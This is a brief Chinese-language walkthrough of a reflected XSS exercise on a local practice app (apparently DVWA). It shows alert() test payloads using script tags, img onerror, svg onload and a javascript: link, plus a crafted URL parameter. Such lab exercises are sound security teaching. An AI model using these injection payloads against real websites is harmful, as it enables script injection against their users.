XSS (Reflected)-反射型XSS

📍 路径

访问：

http://localhost:8080/vulnerabilities/xss_r/

你会看到一个简单的表单，只有一个输入框，提示类似：

What’s your name?

🧪 Step 1：输入测试 Payload

在输入框里输入：

<script>alert('XSS')</script>

然后点击 Submit。

✅ 预期效果：
页面会刷新，同时浏览器会弹出一个提示框，显示内容为 XSS。

🔁 Step 2：确认漏洞是“反射型”

反射型 XSS 的特征是——你注入的脚本被立即反射回页面，例如你访问：

http://localhost:8080/vulnerabilities/xss_r/?name=<script>alert('XSS')</script>

你会发现你的输入直接出现在页面上，说明页面未做过滤/编码处理。

💡 Step 3：尝试其他 Payload

有些浏览器或安全等级会拦截

图片 onerror：

<img src=x onerror=alert('XSS')>

SVG onload：

<svg/onload=alert('XSS')>

JS URL 方案（有时配合链接）：

<a href="javascript:alert('XSS')">Click me</a>